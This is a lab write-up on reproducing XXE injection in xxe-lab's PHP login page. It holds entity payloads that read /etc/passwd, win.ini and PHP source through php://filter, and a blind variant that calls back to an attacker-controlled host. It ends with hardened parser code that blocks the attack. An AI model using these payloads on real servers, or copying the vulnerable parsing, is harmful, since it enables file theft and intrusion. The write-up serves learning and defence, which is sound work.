Security: XXE vulnerability reproduction (xxe-lab)
2022-07-06 03:49:00 【Fox FM】
Preface
Installation is skipped here; xxe-lab ships several environments, and the PHP one is used below.
For learning records only; do not use for illegal purposes.
I am not very familiar with XXE; if there are any mistakes, you can correct them in the comments.
Related reading:
- XML External Entities (XXE) injection explained in detail
- Security - php://filter file inclusion analysis (bugku)
- XXE injection advanced attack payload summary
I. Enabling the environment
Start Apache or Nginx and visit
http://127.0.0.1/xxe-lab-master/php_xxe/
If the proxy does not capture requests sent to 127.0.0.1, access the page through the machine's intranet IP instead; the captured request then shows the data the login form submits.
II. Vulnerability reproduction
[1]. Analysis
Replaying the login request in Repeater shows that the response echoes the content of username (the format below is slightly changed). So the entity only needs to be placed in username for its value to be echoed.
[2]. Constructing the payload
Add the XML declaration (optional; the payload also works without it):
<?xml version="1.0" encoding="UTF-8"?>
DTD (document type definition): the name given after DOCTYPE is arbitrary and has no effect, but DOCTYPE itself must be uppercase (DOC for document, TYPE for type).
<!DOCTYPE name []>
Then declare the XML entity that does the file reading. It must go inside the [] of the DOCTYPE:
<!ENTITY entityName SYSTEM "file:///absolute path">
Then reference the entity in an XML tag whose data is echoed:
&entityName;
Two useful targets: c:/windows/win.ini is a default Windows configuration file, and /etc/passwd is where Linux stores account information.
Even with echo available, referencing the entity in password shows nothing, because password is not reflected; not getting the passwd content back through the password tag does not mean the XXE is absent. The username tag is what proves the vulnerability.
[3]. Reading a file from a relative path
The file protocol reads absolute paths; to read through a relative path, php://filter can be used.
- The POST goes to doLogin.php, so relative paths are resolved from that script's working directory.
- With the parameters below, the file content is returned base64-encoded. The encoding matters: PHP source starts with <?php and contains & and < characters, which would make the substituted entity ill-formed XML, whereas base64 is plain character data.
php://filter/read=convert.base64-encode/resource=relative path
- Read the doLogin.php file itself (if the file name is unknown, brute-force it with Intruder); base64-decoding the result gives the file content.
- The case of the file name did not matter here, which is what a case-insensitive (Windows) filesystem gives; on Linux the exact case is required.
You can also use ../ to jump to the parent directory and read from there.
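The two payloads from [2] and [3], run offline against the same parser options doLogin.php uses, as an added example that is not code from xxe-lab or from the original post. It constructs its own target file instead of relying on /etc/passwd or win.ini, reads its own source through php://filter, and assumes the document layout doLogin.php expects (a root element with username and password children; the root name `user` and the script name `xxe_demo.php` are assumptions).

```php
<?php
// Added example, not code from xxe-lab: reproduces the payloads from
// sections [2] and [3] offline, with the same parser options doLogin.php
// uses (LIBXML_NOENT | LIBXML_DTDLOAD). Run with: php xxe_demo.php

// PHP under a web server runs with the working directory set to the script's
// directory, which is why "resource=doLogin.php" resolves in the lab. The CLI
// keeps the caller's cwd, so it is set explicitly here.
chdir(__DIR__);

// Build the document from the pieces described above. The entity name and the
// DOCTYPE name are arbitrary; only SYSTEM "<url>" and the &file; reference in
// the echoed <username> element matter. The root element name "user" is an
// assumption; doLogin.php only reads the username and password children.
function build_payload(string $systemId): string
{
    return '<?xml version="1.0" encoding="UTF-8"?>' . "\n"
        . '<!DOCTYPE test [ <!ENTITY file SYSTEM "' . $systemId . '"> ]>' . "\n"
        . '<user><username>&file;</username><password>x</password></user>';
}

// Parse the way doLogin.php does and return what ends up inside <username>.
// LIBXML_NOENT is the flag that makes libxml substitute, and therefore fetch,
// the external entity; without it &file; is left as an unexpanded reference.
function parse_like_dologin(string $xml): string
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    return (string) $creds->username;
}

// 1. Absolute path through file://. A target file is constructed here so the
//    demo does not depend on /etc/passwd or c:/windows/win.ini existing.
$target = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'xxe_demo_target.txt';
file_put_contents($target, "root:x:0:0:root:/root:/bin/bash\n");
$fileUrl = 'file:///' . ltrim(str_replace('\\', '/', $target), '/');
echo "[file://]      ", parse_like_dologin(build_payload($fileUrl));
unlink($target);

// 2. Relative path through php://filter, reading this very script. The
//    base64 step is what makes this work: the file begins with "<?php" and
//    contains '&' characters, which would not survive being parsed as XML
//    text, whereas a base64 string is plain character data.
$b64 = parse_like_dologin(build_payload(
    'php://filter/read=convert.base64-encode/resource=' . basename(__FILE__)
));
$source = base64_decode($b64, true);
echo "[php://filter] ", strlen($source), " bytes, first line: ",
     strtok($source, "\n"), "\n";
```

The first case prints the constructed passwd-style line; the second prints the byte count of this script and its first line, `<?php`, which is the same content the lab returns for doLogin.php once the base64 is decoded.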
III. XXE without echo
Change doLogin.php to the code below, so the original echo of username is gone:
```php
<?php
/**
 * author: c0ny1
 * date: 2018-2-7
 */
$USERNAME = 'admin'; // account
$PASSWORD = 'admin'; // password
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
    $dom = new DOMDocument();
    // LIBXML_NOENT makes libxml substitute (and therefore fetch) external entities
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $username = $creds->username;
    $password = $creds->password;
    if($username == $USERNAME && $password == $PASSWORD){
        $result = "Login successful";
        //$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
    }else{
        $result = "Login failed";
        //$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
    }
}catch(Exception $e){
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
```
If the target has outbound network access, start an HTTP server with Python on a host you control; a request from the target in the server's access log shows that the XXE exists.
python -m http.server [port]
Under Python 2 start the HTTP server with:
python -m SimpleHTTPServer [port]
Then POST an XML document whose DTD declares the entity:
<!DOCTYPE test[ <!ENTITY data SYSTEM "http://attacker IP:port"> ]>
followed by the login elements that reference it, for example <user><username>&data;</username><password>x</password></user>.
The submitted username and password are both processed by the server even though neither is echoed, so referencing the entity in either of these two fields triggers the vulnerability without echo.
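The credential parsing of doLogin.php next to a hardened form, as an added example that is not code from xxe-lab. It drops the two parser flags that make the lab exploitable, rejects any document that carries a DOCTYPE, and installs a libxml entity loader that records and refuses every external load, which shows whether the blind payload above still causes a fetch. The attacker host `attacker.example`, the root element name `user` and the script name `xxe_harden.php` are assumptions.

```php
<?php
// Added example, not code from xxe-lab: the credential parsing of doLogin.php
// in its vulnerable form next to a hardened form, plus a probe that records
// every external entity load libxml attempts. Run with: php xxe_harden.php

// Vulnerable: what doLogin.php does. LIBXML_NOENT substitutes entities and so
// fetches whatever SYSTEM identifier the attacker declared; LIBXML_DTDLOAD
// additionally fetches an external DTD named in the DOCTYPE.
function parse_vulnerable(string $xml): ?array
{
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD)) {
        return null;
    }
    $creds = simplexml_import_dom($dom);
    return ['username' => (string) $creds->username,
            'password' => (string) $creds->password];
}

// Hardened. The login document never needs a DTD, so any DOCTYPE is rejected
// outright; without NOENT/DTDLOAD, libxml 2.9+ leaves entity references
// unexpanded and loads nothing; LIBXML_NONET blocks network fetches as a
// second layer in case someone adds a flag back later.
function parse_hardened(string $xml): ?array
{
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        return null;                   // cheap rejection before parsing
    }
    $dom = new DOMDocument();
    if (!$dom->loadXML($xml, LIBXML_NONET) || $dom->doctype !== null) {
        return null;                   // malformed, or a DTD slipped past the
    }                                  // string check (e.g. a UTF-16 document)
    $creds = simplexml_import_dom($dom);
    return ['username' => (string) $creds->username,
            'password' => (string) $creds->password];
}

// Probe: replace libxml's entity loader with one that logs the URL and refuses
// to load it. A refusing loader is itself a sound hardening step, independent
// of the parser flags.
$attempted = [];
libxml_set_external_entity_loader(
    function ($publicId, $systemId, $context) use (&$attempted) {
        $attempted[] = $systemId;
        return null;                   // null = the load fails
    }
);
libxml_use_internal_errors(true);      // keep libxml warnings off stdout

// The blind payload from section III; attacker.example is a placeholder.
$blind = '<!DOCTYPE test [ <!ENTITY data SYSTEM "http://attacker.example:8000/"> ]>'
       . '<user><username>&data;</username><password>x</password></user>';
$benign = '<user><username>admin</username><password>admin</password></user>';

foreach (['vulnerable' => 'parse_vulnerable', 'hardened' => 'parse_hardened'] as $label => $fn) {
    $attempted = [];
    $r = $fn($blind);
    printf("%-10s blind : result=%s, external loads attempted=%d %s\n",
           $label, $r === null ? 'rejected' : 'parsed', count($attempted),
           $attempted ? '(' . $attempted[0] . ')' : '');
    $attempted = [];
    $r = $fn($benign);
    printf("%-10s benign: username=%s, external loads attempted=%d\n",
           $label, $r['username'] ?? 'rejected', count($attempted));
}
libxml_clear_errors();
```

The vulnerable parser reports one attempted load of http://attacker.example:8000/ for the blind payload, which is the request that would show up in the Python server's log; the hardened parser rejects that document with no load attempted and still reads admin/admin from the benign one. Note that libxml_disable_entity_loader(), which the lab calls with false, is deprecated since PHP 8.0; the LIBXML_NOENT and LIBXML_DTDLOAD flags are what decide whether the entity is fetched.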